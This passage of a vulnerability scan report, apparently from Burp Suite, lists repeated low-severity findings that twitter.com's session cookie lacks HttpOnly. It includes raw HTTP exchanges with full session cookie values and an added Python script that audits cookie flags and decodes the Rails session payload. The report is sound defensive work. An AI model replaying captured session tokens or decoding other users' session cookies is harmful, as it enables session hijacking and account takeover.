Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-63986-28033
ETag: "94982feeb68a0a8cb68c04820be2cd8d"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00768
Content-Type: text/html; charset=utf-8
Content-Length: 52761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.21. http://twitter.com/ChrisLambton13

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ChrisLambton13

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ChrisLambton13 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:51:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265908-61244-34588
ETag: "2188d703ab23d0ac8a30be86c7dd57e4"
Last-Modified: Sat, 29 Jan 2011 01:51:48 GMT
X-Runtime: 0.01239
Content-Type: text/html; charset=utf-8
Content-Length: 50278
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.22. http://twitter.com/ConanOBrien

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ConanOBrien

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ConanOBrien HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-23118-1747
ETag: "86f99f7437978cad54926bacf38c847f"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01272
Content-Type: text/html; charset=utf-8
Content-Length: 36266
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.23. http://twitter.com/DustinPedroia15

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /DustinPedroia15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DustinPedroia15 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266020-27916-18382
ETag: "e0a2dddf6e04f8631a548ec38cc9be5b"
Last-Modified: Sat, 29 Jan 2011 01:53:40 GMT
X-Runtime: 0.01575
Content-Type: text/html; charset=utf-8
Content-Length: 29153
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.24. http://twitter.com/ExpertDan

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ExpertDan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225052-83422-12297
ETag: "71df0fbad70a67fb009c57f7a62454f1"
Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT
X-Runtime: 0.01535
Content-Type: text/html; charset=utf-8
Content-Length: 53009
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
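The findings in this section (11.24 onward) are one issue repeated across paths: the _twitter_sess cookie is set without HttpOnly, and, since the requests are plain HTTP, without Secure as well. The script below is an added example and not part of the scanner output. It re-checks a pasted response for missing cookie flags, separates a cookie the server is merely clearing (auth_token, empty value plus a 1970 Expires) from a live finding, and decodes the payload half of a Rails 2.x CookieStore value to show that it is a signed but unencrypted Ruby Marshal dump, readable by anything that can read the cookie. The sample response is constructed from the header block of finding 11.24 above, trimmed to the relevant lines; the SESSION_HINTS list and the repeated percent-decoding loop are assumptions about how to recognise session cookies and about how this particular value was encoded on the wire.

```python
"""Re-check Set-Cookie flags in a raw HTTP response and look inside a Rails
CookieStore session cookie. Added example for the HttpOnly findings in this
report; it is not part of the scanner output."""
import base64
import re
from urllib.parse import unquote

# Constructed from the response headers of finding 11.24 above, trimmed to the
# lines that matter for the cookie check.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\r\n"
    "Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm"
    "%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG"
    "%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B"
    "--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    "<!DOCTYPE html>..."
)

# Assumption: cookie names containing these substrings are treated as session-like.
SESSION_HINTS = ("sess", "session", "auth", "token", "sid")
# Rails 2.x CookieStore layout: base64(Marshal.dump(hash)) + "--" + hex HMAC-SHA1.
RAILS_SIGNED = re.compile(r"^[A-Za-z0-9+/=%]+--[0-9a-f]{40}$")


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=val' into (name, value, {attr_lower: val})."""
    first, *rest = header_value.split(";")
    name, _, value = first.strip().partition("=")
    attrs = {}
    for part in rest:
        key, _, val = part.strip().partition("=")
        if key:
            attrs[key.lower()] = val
    return name, value, attrs


def audit_cookies(raw_response):
    """One dict per Set-Cookie header: which of HttpOnly/Secure are missing,
    whether the name looks like a session token, and whether the server is
    merely clearing the cookie (empty value plus an Expires attribute, as
    auth_token above), which is not a live finding."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    results = []
    for line in head.split("\r\n"):
        key, sep, val = line.partition(":")
        if not sep or key.strip().lower() != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(val.strip())
        results.append({
            "name": name,
            "value": value,
            "missing": [f for f in ("httponly", "secure") if f not in attrs],
            "cleared": value == "" and "expires" in attrs,
            "session_like": any(h in name.lower() for h in SESSION_HINTS),
            "rails_signed": bool(RAILS_SIGNED.match(value)),
        })
    return results


def rails_cookie_payload(value):
    """Return the Marshal bytes of a Rails CookieStore cookie value.

    The HMAC stops tampering but not reading: the payload is plain base64, so
    anything able to read the cookie (document.cookie, absent HttpOnly) reads
    the whole session hash."""
    payload, sep, sig = value.rpartition("--")
    if not sep or not re.fullmatch(r"[0-9a-f]{40}", sig):
        raise ValueError("not a signed Rails CookieStore cookie")
    # Assumption about this value's encoding: it was percent-encoded twice
    # (%250A -> %0A -> newline), so decode until no '%' remains.
    for _ in range(3):
        if "%" not in payload:
            break
        payload = unquote(payload)
    raw = base64.b64decode(payload.replace("\n", ""))
    if raw[:2] != b"\x04\x08":  # Ruby Marshal format version 4.8
        raise ValueError("payload is not Ruby Marshal data")
    return raw


def marshal_strings(raw, min_len=4):
    """Printable ASCII runs in the Marshal dump: enough to see hash keys and
    class names without a Ruby interpreter."""
    return [m.decode() for m in re.findall(rb"[ -~]{%d,}" % min_len, raw)]


if __name__ == "__main__":
    for c in audit_cookies(SAMPLE_RESPONSE):
        status = "cleared" if c["cleared"] else "missing " + ", ".join(c["missing"])
        print(f"{c['name']}: {status}; session-like={c['session_like']}; "
              f"rails-signed={c['rails_signed']}")
        if c["rails_signed"]:
            print("  payload strings:", marshal_strings(rails_cookie_payload(c["value"])))
```

Run as a script it prints one line per cookie: auth_token is reported as cleared, _twitter_sess as missing both HttpOnly and Secure, followed by the strings from its payload, which show a three-entry hash (:id holding a 32-hex session id, "flash" holding an ActionController::Flash::FlashHash, and :created_at holding a millisecond timestamp that decodes to 28 Jan 2011 14:04 UTC, inside the scan's time window). Secure appears because the check is generic; on this report's plain-HTTP requests its absence would be a separate issue.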

11.25. http://twitter.com/GQMagazine

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /GQMagazine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GQMagazine HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265974-66159-11366
ETag: "0c7b3f1ee02a220dddae84a56bd4dae8"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
X-Runtime: 0.01364
Content-Type: text/html; charset=utf-8
Content-Length: 51000
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.26. http://twitter.com/Gr8BosFoodBank

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Gr8BosFoodBank

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Gr8BosFoodBank HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-79208-29747
ETag: "a6d77c28a643e235a002a7eb55dd8452"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00773
Content-Type: text/html; charset=utf-8
Content-Length: 53288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.27. http://twitter.com/Harvard

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Harvard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Harvard HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265976-30452-57191
ETag: "f592e2869b28d974ff30653c3b748799"
Last-Modified: Sat, 29 Jan 2011 01:52:56 GMT
X-Runtime: 0.01723
Content-Type: text/html; charset=utf-8
Content-Length: 51819
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.28. http://twitter.com/Jarvis_Green

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
